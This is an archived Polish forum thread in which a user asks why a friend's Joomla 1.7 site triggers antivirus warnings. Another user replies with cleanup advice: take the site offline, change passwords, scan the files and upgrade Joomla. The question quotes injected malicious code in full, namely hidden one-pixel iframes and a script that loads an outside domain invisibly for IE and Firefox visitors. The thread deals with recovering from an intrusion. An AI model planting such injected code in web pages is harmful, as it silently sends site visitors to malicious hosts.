PDA

Zobacz pełną wersję : linki do niebezpiecznych stron



slitmen
23-03-2012, 10:43
Witam, znajomy ma strone na joomla i od jakiegos czasu programy antyvirusowe po jej wlaczeniu w przegladarce informuja o niebezpiecznych linkach.

po przejrzeniu kodu w pierwszej lini znalazlem ponizsze linki:


<iframe src=http://globedrumexp.com/stata7.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME><iframe src=http://www.polisportivasannicola.it/s0910/Pager/stata1.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME><script>var url="http://pc-onlinegames.net";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>

Jak mogly sie one dostac na strone i gdzie moge je usunac?

z gory dziekuje za pomoc

P.S
Joomla 1.7

PeFik
23-03-2012, 13:35
1) Niech twój znajomy wyłączy strony stronę (tryb OFFline) do chwili usunięcia śladu włamania, to ważne.
2) Niech zmieni hasło do zaplecza, oraz do FTP !!
3) Teraz trzeba przeskanować wszystkie pliki !! pod kątem w którym ktoś coś zmienił, ja bym obstawiał index.php w szablonie , wiem bo pomagam w tego typu przypadkach nie od dziś
4) Po wykryciu - usunąć niechciane zmiany .... i zabezpieczyć serwis na przyszłość.


Joomla 1.7 -> umarła --> zatem sugeruje J2.5, chyba to wszystko wyjaśnia, w temacie bezpieczeństwa (http://blog.elimu.pl/tag/bezpieczenstwo/) !!